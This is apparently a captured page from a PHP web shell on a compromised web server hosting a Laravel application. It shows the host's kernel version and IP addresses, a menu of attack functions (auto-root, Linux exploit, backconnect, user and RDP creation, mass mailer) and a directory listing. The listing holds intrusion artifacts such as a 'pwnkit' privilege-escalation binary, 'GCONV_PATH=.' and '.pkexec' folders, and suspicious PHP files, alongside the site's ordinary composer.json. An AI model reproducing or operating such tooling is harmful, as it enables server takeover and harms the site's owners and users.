Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo18.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
fbvuntc
[ DIR ]
drwxr-xr-x
hxfbgsa
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
main-file
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
ocdphvj
[ DIR ]
drwxr-xr-x
packages
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxrwx
resources
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
storage
[ DIR ]
drwxrwxrwx
stubs
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
u1qowlk
[ DIR ]
drwxr-xr-x
uvyb1tk
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxrwxr-x
wfpjzv1
[ DIR ]
drwxr-xr-x
yidwnsz
[ DIR ]
drwxr-xr-x
ylazesv
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-rw-r--
.env
624
B
-rwxrwxrwx
.env.example
1.05
KB
-rw-rw-r--
.gitattributes
186
B
-rw-rw-r--
.gitignore
315
B
-rw-rw-r--
.htaccess
479
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
LICENSE
1.05
KB
-rw-rw-r--
artisan
350
B
-rwxrwxr-x
components.json
348
B
-rw-rw-r--
composer.json
3
KB
-rwxrwxr-x
composer.lock
492.42
KB
-rw-rw-r--
error_log
21.75
KB
-rw-r--r--
etigewrm.php
167.15
KB
-rw-r--r--
extract-translations.php
5.01
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
index.php
1.18
KB
-rw-r--r--
license-iuzn.php
629
B
-rw-r--r--
package-lock.json
349.45
KB
-rw-rw-r--
package.json
3.36
KB
-rw-rw-r--
phpunit.xml
1.16
KB
-rw-rw-r--
postcss.config.js
93
B
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
90
B
-rw-r--r--
tailwind.config.js
2.39
KB
-rw-rw-r--
tsconfig.json
592
B
-rw-rw-r--
vite.config.js
1.5
KB
-rw-rw-r--
wp-blog-header.php
0
B
-rw-r--r--
wp-load.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "type": "project", "description": "The skeleton application for the Laravel framework.", "keywords": ["laravel", "framework"], "license": "MIT", "require": { "php": "^8.2", "anhskohbo/no-captcha": "^3.7", "bacon/bacon-qr-code": "^3.0", "google/apiclient": "^2.18", "inertiajs/inertia-laravel": "^2.0", "larabug/larabug": "^3.4", "laravel/framework": "^12.0", "laravel/sanctum": "^4.2", "laravel/socialite": "^5.23", "laravel/tinker": "^2.9", "league/flysystem-aws-s3-v3": "^3.31", "league/oauth2-client": "^2.8", "mailchimp/marketing": "^3.0", "microsoft/microsoft-graph": "^2.49", "paragonie/sodium_compat": "^2.5", "phpoffice/phpspreadsheet": "^5.1", "pragmarx/google2fa-laravel": "^2.3", "pusher/pusher-php-server": "^7.2", "salla/zatca": "^3.0", "spatie/laravel-google-calendar": "^3.8", "spatie/laravel-medialibrary": "^11.14", "spatie/laravel-permission": "^6.21", "srmklive/paypal": "^3.0", "stripe/stripe-php": "^17.6", "tightenco/ziggy": "^2.0", "twilio/sdk": "^8.8", "webklex/laravel-imap": "^6.2" }, "require-dev": { "barryvdh/laravel-debugbar": "^3.9", "fakerphp/faker": "^1.23", "laravel/breeze": "^2.0", "laravel/pint": "^1.13", "laravel/sail": "^1.26", "mockery/mockery": "^1.6", "nunomaduro/collision": "^8.0", "phpunit/phpunit": "^11.0", "spatie/laravel-ignition": "^2.4" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/", "Workdo\\LandingPage\\": "packages/workdo/LandingPage/src/" }, "files": [ "app/Helpers/Helper.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi", "@php -r \"file_exists('database/database.sqlite') || touch('database/database.sqlite');\"", "@php artisan migrate --graceful --ansi" ] }, "extra": { "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true, "php-http/discovery": true, "tbachert/spi": true } }, "minimum-stability": "stable", "prefer-stable": true }
Close